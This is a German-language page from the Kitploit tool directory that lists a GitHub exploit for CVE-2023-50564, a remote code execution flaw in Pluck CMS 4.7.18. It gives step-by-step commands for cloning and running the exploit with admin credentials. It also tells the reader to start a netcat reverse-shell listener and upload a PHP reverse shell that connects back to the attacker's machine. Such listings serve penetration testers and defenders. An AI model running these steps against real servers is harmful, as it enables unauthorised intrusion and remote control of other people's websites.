Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-50564 — Pluck v4.7.18 - Remotecodeausführung (RCE) | Kitploit
Tools/GitHubGitHub/glynzr/cve-2023-50564
Payload-GenerierungSchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubglynzr/cve-2023-50564

CVE-2023-50564

Pluck v4.7.18 - Remotecodeausführung (RCE)

Repository anzeigen
4vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-50564

📌 Beschreibung

Dieser Exploit ermöglicht es einem authentifizierten Admin in Pluck CMS v4.7.18, ein bösartiges ZIP-Modul mit einer PHP-Shell hochzuladen, was zu einer Remote-Codeausführung (RCE) führt.


⚙️ Funktionen

  • Authentifiziert sich am Ziel mit einem gültigen Benutzernamen und Passwort
  • Erstellt automatisch ein ZIP-Archiv aus einer bereitgestellten PHP-Datei
  • Lädt das Modul auf den verwundbaren installmodule-Endpunkt hoch
  • Löst die Payload aus und zeigt die Ausgabe an
  • Unterstützt benutzerdefiniertes Ziel, Port, Anmeldedaten und Shell-Pfad

🚀 Verwendung

root@kitploit:~
git clone https://github.com/glynzr/CVE-2023-50564.git
cd CVE-2023-50564
pip3 install -r requirements.txt

python3 exploit.py -h
root@kitploit:~
python3 exploit.py -t <target> -u <username> -pass <password> -path <path_to_php_shell> [-p <port>]
  • Der Port ist optional und standardmäßig auf 80 gesetzt, falls nicht angegeben.
  • Bei Angabe des Ziels ist die IP-Adresse oder der Domainname erforderlich (z. B. 127.0.0.1 oder test.domain).
Tool herunterladen

Beispiel-Exploit

Zuerst sollte auf der Angreifermaschine ein Reverse-Shell-Listener gestartet werden (dieser Terminal-Tab sollte nicht geschlossen werden):

root@kitploit:~
nc -nvlp <port angeben>

Dann laden Sie die PHP-Reverse-Shell von https://github.com/pentestmonkey/php-reverse-shell herunter und passen Sie sie an die Angreifermaschine an (IP, Port).

Führen Sie den Exploit-Code in einem anderen Tab aus:

root@kitploit:~
python3 exploit.py -t test.com -u admin -pass samplepassword -path ../php-reverse-shell.php